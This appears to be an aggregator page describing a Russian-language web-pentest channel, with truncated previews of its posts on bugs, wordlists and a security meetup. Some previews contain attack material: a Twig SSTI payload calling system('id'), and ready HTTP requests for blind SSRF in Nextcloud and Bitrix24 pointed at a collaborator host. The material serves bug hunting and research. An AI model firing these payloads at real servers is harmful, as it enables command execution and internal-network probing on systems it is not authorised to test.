О канале Заметки склерозного вебера
By @ArroizX
AI-обзор
Обновлено 20.07.2026Канал "Заметки склерозного вебера" ведёт автор @ArroizX и посвящён темам программирования и информационных технологий. В последнее время в посты публикуются ссылки на интересные проекты, статьи о багах и фичах различных платформ, а также информация о мероприятиях для разработчиков.
Описание сформировано MaxBook AI на основе последних публикаций канала.
Основные метрики
Рост подписчиков
Вовлечённость
Здоровье аудитории
Часовая активность
МСККогда канал публикует — распределение постов по часам суток.
Последние публикации канала «Заметки склерозного вебера»
- 279 просмотров, 7 реакций, 03 июл. 2026 г.
24 июля в 15:30 в Московском офисе Positive Technologies пройдет митап для начинающих специалистов. Это возможность познакомиться с коллегами Позитива, различными направлениями в компании и послушать реальный опыт коллег. В программе: ➡️ Владимир Николаев , эксперт PT Lab, погрузит во внутрянку агентов Caldera ➡️ Андрей Михайлов , младший инженер PT Lab, расскажет, как создаются лабораторные стенды для практики ➡️ Евгений Копытин , специалист отдела анализа защищенности веб-приложений, раскроет полный потенциал SSRF ➡️ Приглашенный Спикер и тема останутся сюрпризом 🫥 А еще будет…
Открыть пост в MAX - 270 просмотров, 2 реакций, 03 июл. 2026 г.
Решил тут поучаствовать в митапе ПТ, поэтому если тут есть начинающие спецы, которые хотят послушать интересные доклады, то можете зарегистрироваться:D
Открыть пост в MAX - 3.4K просмотров, 20 реакций, 24 июн. 2026 г.
SSTI ❤️ htmlspecialchars() Попался тут интересный проект, в котором нашлась Twig SSTI'ка, до которой, чтобы добраться, нужно обойти несколько ограничений: Удалось её обнаружить после того, как я решил поиграться с шаблонами для почты. Обычная нагрузка {{7*7}} давала по итогу 7*7 . Подумав, что это может быть какой-то кривой патч, я вставил нагрузку {{{{7*7}}}} и получил в итоге 49 (никогда не думал, что встречу такой тупизм :D) ! Казалось бы, что это победа, однако если нагрузка сложнее математической операции, например, {{{{['id']|filter('system')}}}} , то ничего не отрабатывало. Поэтому я…
Открыть пост в MAX - 903 просмотров, 29 реакций, 31 мая 2026 г.
Очередной пост - очередной репозиторий Недавно на проекте коллега пропустил swagger , потому что перебрал маршруты не тем словарём, но благо мне удалось это отловить. И в голове возникла идея уже наконец-то сесть и составить словари, которые можно было бы использовать не боясь, что что-то упустишь, так как заюзал не тот словарь. Для этого я решил сделать 5 видов словарей: - Длинный словарь для брута маршрутов - содержит практически каждый валидный путь из множества популярных словарей. - Короткий словарь для брута маршрутов - там будут только маршруты, которые часто повторяются в большинстве…
Открыть пост в MAX - 805 просмотров, 46 реакций, 21 апр. 2026 г.
Ну чтож, поехали! Надеюсь, что на этот раз сдам не с 4 попытки:D После сдачи поделюсь материалами и впечатлениями, конечно=)
Открыть пост в MAX - 825 просмотров, 20 реакций, 20 апр. 2026 г.
Если бы меня спросили, какие мои самые любимые баги, то я, не раздумывая, ответил бы: Race Condition, Business logic, BAC и percent hack. Я думаю, что многие видели и читали ЭТУ статью от Gareth Heyes. К сожалению, мало где можно встретить интересный парсинг почтового адреса, но во время прочтения мне почему‑то врезался в память трюк с percent hack, и так получилось, что это стало моей постоянной проверкой, если вдруг в приложении существуют ограничения на домен почтового адреса (не важно, black list или white list). И вот в очередной раз, когда между проектами появилось немного времени, я с…
Открыть пост в MAX - 1.1K просмотров, 16 реакций, 31 мар. 2026 г.
Что-то весна какая-то тяжёлая вплане кол-ва работы и дел, из-за чего я почти нарушил свой принцип "постить что-то хотя бы раз в месяц". Поэтому пока залью полезные репозитории/статьи, которые привлекли моё внимание: Прикольный репозиторий, если нужно разобраться как работает сериализация/десериализация в популярных языках: материалы, инструменты, лабораторные и пр. - https://github.com/f0ur0four/Insecure-Deserialization Интересные статьи по Next.js, которые также хорошо объясняют работу некоторых механизмов Next.js -…
Открыть пост в MAX - 1.4K просмотров, 16 реакций, 21 февр. 2026 г.
Неавторизированная Blind SSRF в NextCloud Как-то недавно я обнаружил эту страничку и решил глянуть, что это за функциональность в коде Nextcloud. И оказалось, что в Nextcloud до 31 версии любой внешний пользователь может эксплуатировать Blind SSRF : GET /index.php/apps/files_sharing/testremote?remote=collaborator.com HTTP/2 Host: example.com Cookie: ... Requesttoken: <token> Ocs-Apirequest: true Нужные куки и другие данные можно взять с запроса с попыткой входа в УЗ. Так что, багхантеры и пентестеры, вперёд:D
Открыть пост в MAX - 1.3K просмотров, 5 реакций, 01 февр. 2026 г.
Исправление регулярок + шпаргалка по Nginx Вот и пролетел Январь, а из-за кучи работы и сессии я не успел ничего интересного запостить, поэтому исправляюсь: 1) Наконец сел и поправил свои регулярки по языкам : - Поправил обобщённые регулярки, чтобы VS Code не выдавал ошибок, было меньше false positive результатов и были учтены все регулярки ниже; - Добавил рефлексию в Ruby, которую позже докину в другие языки; - Поправил повторяющуюся регулярку в Go. 2) Слегка поменял структуру шпаргалок в репозитории Pentest-CheatSheet-Popular-Services , а также добавил новую шпаргалку для анализа…
Открыть пост в MAX - 2.1K просмотров, 18 реакций, 19 дек. 2025 г.
Решил сделать последний в этом году пост про наш любимый битрикс: Авторизированная SSRF в Битрикс24 через интеграцию с MS Sharepoint В Битрикс24 существует возможность интеграции с MS Sharepoint для синхронизации различных списков: клиенты, календарь и пр. Подробнее про это можете прочитать ТУТ . Нас же интересует здесь то, что мы можем использовать данную функциональность для SSRF-атак, главное - это иметь любую валидную учётку: GET /bitrix/components/bitrix/sharepoint.link/ajax.php?mode=test&sp_server=http://collaborator&sp_user=&sp_pass=&sessid=... HTTP/1.1 Host: bitrix24 Cookie: ...…
Открыть пост в MAX - 1.9K просмотров, 9 реакций, 06 дек. 2025 г.
Баги и фичи ASP.NET и IIS’a 2.0 Скоро новый год и праздники, а это значит, что после загруженных недель будет достаточно времени, чтобы изучить для себя что-то новенькое! Поэтому в этом посте я решил собрать для вас свои заметки/ссылки по багам и фичам ASP.NET и IIS’a. Да-да, я уже постил запись и презентацию своего доклада по этой же теме 2 апреля, но там я много всего не рассказал из-за временных рамок, так что советую ознакомиться с этой полной версией;) P.S. Рекомендую читать статьи Soroush Dalili в веб-архиве, а то после обновления дизайна сайта некоторые статьи пошли по одному месту=) А…
Открыть пост в MAX - 1.0K просмотров, 13 реакций, 27 окт. 2025 г.
- А если разработчик использует ORM или Query Builder, то это значит, что скулей нет? - Почему? Они и с ними могут быть! Примерно такой вопрос и ответ на него можно часто услышать на собеседованиях по вебчику, однако, потом после оффера и получения работы мало кто на серьёзке будет проверять SQL-запросы через ORM или Query Builder. Зачастую всё заканчивается одной-двумя провальными попытками эксплуатации SQL-инъекции, после чего делается вывод, что "скулей тут нет". Хотя тут стоило просто сесть, развернуть библиотеку у себя с похожими SQL-запросами и потыкать её с дебагом. А где могут быть…
Открыть пост в MAX - 892 просмотров, 16 реакций, 24 окт. 2025 г.
Теперь всё в одном месте Пока ломал голову над тем, что запостить в этот канал, я вспомнил, что делал различные шпаргалки по тестированию популярных сервисов. И подумал что было бы хорошей идеей всё это залить в один GitHub-репозиторий, чтобы удобно было смотреть, а не листать весь канал в поисках шпаргалки по Jir'e с Clonfluence. Поэтому был сделан данный репозиторий: https://github.com/1arroiz/Pentest-CheatSheet-Popular-Services Помимо этого я обновил шпаргалку по Jir'e с Clonfluence, добавив туда новые и упущенные cveшки. P.S. Чуть позже если сойдутся все звёзды я залью в этот репозиторий…
Открыть пост в MAX - 952 просмотров, 5 реакций, 28 сент. 2025 г.
Увидел Java legacy со странным фреймворком - проиграл Встретилось тут на проекте Java веб-приложение старенькое, которое меня неприятно удивило: во всех HTTP-запросах отправлялись не нормальные параметры в разных формах с нормальным API, а координаты моих кликов, а также UUID-кнопок и форм, и отдельные JSON'ы, содержащие данные, которые я заполнял в формах. По типу такого короче: POST /myapp/UIDL/?v-uiId=0 HTTP/1.1 Host: localhost:8080 Content-Type: application/json; charset=UTF-8 Cookie: JSESSIONID=... [ { "csrfToken": "9f7c2a31-8c6d-4f2e-bbd8-fb1d0aefcb1e", "rpc": [ [ 5, "click", {…
Открыть пост в MAX - 908 просмотров, 27 реакций, 24 сент. 2025 г.
Вы думаете только на BugBounty кидают? WARNING: Данный пост написан чисто для выпуска пара, поэтому если вы пришли за полезными материалами, то подождите пару дней, скоро выложу интересный пост про мой опыт тестирования Legacy ужаса, а этот можете тогда скипнуть=) И так, я думаю, что многие слышали про ситуации, когда на ББ выплатили сильно меньше/ничего за багу, хотя по хорошему должны были нормально заплатить. После чего у бедного багхантера горит пукан на золотом стуле, купленном после выплат на бб, и он ноет о несправедливости жизни. У ресёрчеров та же история, только при этом денег почти…
Открыть пост в MAX
Качество и доверие
Эвристические сигналы качества по публичным метрикам (охват, реакции, динамика подписчиков). Это не доказанный фрод и не приговор — лишь поводы присмотреться к каналу.
Реклама и монетизация
Внешняя реклама, которую этот канал размещал в других лентах.
Рекламирует с 14.06.2026
- @webpwn2 поста
- @FaLLenSkiLL1 пост
- канал #some1 пост
- канал #FaLLenSkiLL1 пост
- @proxy_bar1 пост
Цитирование
Сколько раз канал упомянут и репостнут в постах других каналов.